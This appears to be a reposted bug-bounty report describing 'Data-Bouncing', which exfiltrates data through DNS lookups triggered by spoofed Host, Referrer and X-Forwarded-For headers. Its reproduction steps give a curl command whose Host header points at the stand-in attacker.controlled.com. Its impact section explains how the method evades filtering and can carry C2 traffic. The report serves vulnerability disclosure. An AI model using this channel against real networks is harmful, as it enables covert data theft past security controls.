Bouncing Through CloudSpike

*CloudSpike may be a pseudonym

Here be the conversation from the highly reputable CloudSpike via the hackeroony submission page, the problem with databouncing is that it's vale is seen in it's ability inherits the domains trust to transport exfil data, and less informed struggle here, as they are focused on the lack of infrastructure, their infrastructure, or control and in turn recourse, a reflection of understanding, Anything marked as informational on a security triage platform is fair game for public consumption.

Summary:

There exists a method, which we have termed 'Data-Bouncing', that allows for the transmission of data through infrastructure by leveraging crafted web requests combined with DNS A record lookups.

The process involves sending web requests to your domains with varying headers set to domains under an attackers control. So far in our research we have noted that the following headers are susceptible to this type of attack:

• Host
• Referrer
• X-Forwarded-For

With certain outbound requests this facilitates a DNS query to the attackers controlled domain which can result in DNS exfiltration via the outbound domain and further attack strategies as noted in this document.

Overview of stages involved

1. From the targetted network an outbound DNS request would be seen to r2d2.cloudspike.com
2. An HTTP request would be seen exiting the network to r2d2.cloudspike.com
3. Normal path would be for the request to reach the Origin server
4. A DNS request is made based on the Host headers domain which is the attackers controlled DNS server.
5. Data can be fragmented up and sent via this route and reassembled at the attackers host.

Note 1: Targetted Network would not be aware of the intended destination of the data as all DNS lookups and traffic would look legitimate

Note 2: Depending on how the CDN is working the Origin Server may not see the HTTP requests as they may have been handled by the CDN appliance

Steps To Reproduce:

As an example if we make an HTTP GET request to r2d2.cloudspike.com and change the Host header to be r2d2.cloudspike.com.attacker.controlled.com a DNS query can be seen at r2d2.cloudspike.com.attacker.controlled.com.

1. Identify Header Tainting Opportunities:
   
   Example using curl:

curl --request GET \
  --url http://r2d2.cloudspike.com/ \
  --header 'Host: r2d2.cloudspike.com.attacker.controlled.com' 

2. Observe DNS requests at attacker.controlled.com:
   
   By viewing the DNS request logs at attacker.controlled.com you should see a request entry with r2d2.cloudspike.com.attacker.controlled.com

3. Proof of Concept:
   
   This step is optional. Reach out if you'd like us to demonstrate this for you. We also have prebuilt scripts available to search a list of domains en masse.

Impact

This issue's assessment diverges from the conventional CVSS framework. It requires a nuanced approach. We provide the following considerations:

Value to Threat Actors

1. Data Exfiltration via Trusted Domains: Threat actors can transmit data outside of a network using domains that are perceived as trustworthy, making detection more challenging.
2. Circumventing Security Controls: Utilising these techniques, attackers can bypass security measures such as DNS filtering and domain allowlists.
3. Fragmented Data Packet Sending: With a broad range of domains at their disposal, malicious actors can break up the sending of data packets, further evading detection.
4. Eliminating Warm-up Needs and Domain Fronting: The methods remove the need for attackers to prepare domains for their infrastructure or to use techniques like domain fronting.

Legal Risks

1. Regulatory Penalties: Depending on jurisdiction and data type, severe fines may be levied, such as the up to 4% annual global turnover under the GDPR in the EU.
2. Reputational Damage: Legal actions can result in negative publicity, potentially harming long-term brand trust.
3. Sanctions Violations: Unauthorized data transfers to/from entities in sanctioned regions or to sanctioned entities can attract heavy penalties. For instance, the U.S. has extensive sanctions programs governed by OFAC.
4. Legal Scrutiny and Audits: Unauthorized data transfers breaching sanctions can subject an organization to increased regulatory oversight and potential comprehensive business audits.
5. Restricted Business Operations: Sanction violations can curtail an entity's business operations in certain areas or with certain parties.

Operational Risks

1. Downtime: Unauthorised data transfers may necessitate system shutdowns, causing business interruptions. Moreover, addressing the aftermath can strain both internal and external IT and security resources.
2. Loss of Business: Trust issues may lead to severed ties with customers or partners.
3. Increased Costs: Remediation, reputation management, enhanced security, and potential fines or settlements can escalate expenses.
4. Loss of Partnerships: Affiliates might distance themselves from sanction-violating organizations to prevent association or implication.

Technical Risks

1. Malware Facilitation: This method can enable malware, covert communications, C2 data, and unauthorised data transfers, capitalizing on domain trust and exploitability.
2. Increased Monitoring: Sanction breaches might result in heightened digital communications and data transfer scrutiny, adding technical overhead.
3. Infrastructure Limitations: Compliance might require infrastructure restrictions like geo-blocking or access limitation to certain IP ranges.